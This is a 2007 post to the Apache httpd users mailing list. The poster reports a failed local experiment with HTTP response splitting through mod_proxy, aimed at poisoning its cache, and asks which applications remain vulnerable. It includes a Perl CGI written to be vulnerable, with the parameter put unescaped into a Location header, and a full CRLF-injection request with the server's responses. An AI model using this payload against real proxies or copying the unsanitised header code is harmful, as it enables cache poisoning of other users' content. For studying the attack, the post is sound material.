You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Gleb Paharenko <gp...@gmail.com> on 2007/11/29 16:55:36 UTC

[users@httpd] Http splitting does not work with mod_proxy

Hi list.

Hope somebody will spent some time on my question :),
or point me to the right list.

Is http splitting still works in fresh version of common applications
of apache?

I've wrote sample application (cgi script) vulnerable to it, however
apache mod_proxy just ignores the answer, and initiates a new
connection for  each request.

Chain:

Client (netcat) -> Apache(mod_proxy) -> Apache -> vulnerable cgi.
Proxy is on localhost.
Goal: poison mod_proxy's cache
The cgi is:

#!/usr/bin/perl
use CGI qw(:standard);
print "Status: 302 Moved\nLocation: ".param('name')."\n\n";

The attemt to exploit is:

#nc localhost 80
GET http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>
HTTP/1.1
Host: test.xxx

HTTP/1.1 302 Moved
Date: Thu, xx Nov 2007 xx:25:03 GMT
Server: Apache/2.0.xx (Unix) mod_ssl/2.0.xx OpenSSL/xxx DAV/2
Location: Foo
Content-Length: 0
Content-Type: text/plain
Via: 1.1 client.xxx (Apache/2.xx)

GET http://test.xxx/1.html HTTP/1.1
Host: test.xxx

HTTP/1.1 200 OK
Date: Thu, xx Nov 2007 15:25:09 GMT
Server: Apache/2.xx (Unix) mod_ssl/2.xx OpenSSL/0.xx DAV/2
Last-Modified: Thu, xx Nov 2007 xxx GMT
ETag: "2c8be-2-c4f7b640"
Accept-Ranges: bytes
Content-Length: 2
Content-Type: text/html


1

However, as I've found, mod_proxy initiates a new connection for the
second  GET. That breaks the whole idea to exploit http splitting. Is
it some kind of new protection feature in apache mod_proxy?
Please, could anybody provide a brief description of common
applications on which attack is working. It seems vendors have done a
great job (like filtering characters in PHP header, or Tomcat).

Feel free to ask any questions to get more info.

-- 
Best regards.
Gleb Pakharenko.

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org